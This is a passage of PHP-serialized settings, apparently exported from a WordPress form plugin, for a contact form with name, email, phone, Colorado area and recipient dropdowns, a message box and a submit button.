sc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_179\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_179\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:235;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_180\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_180\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:236;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_181\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_181\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:237;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_182\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_182\";}s:2:\"id\";i:238;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"Initiator-Joe Wells\";s:5:\"value\";s:19:\"Initiator-Joe Wells\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166886411\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_185\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:241;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_186\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_186\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:242;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800683276\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"636\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_188\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_188\";}s:2:\"id\";i:244;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:55\";s:5:\"label\";s:9:\"Save 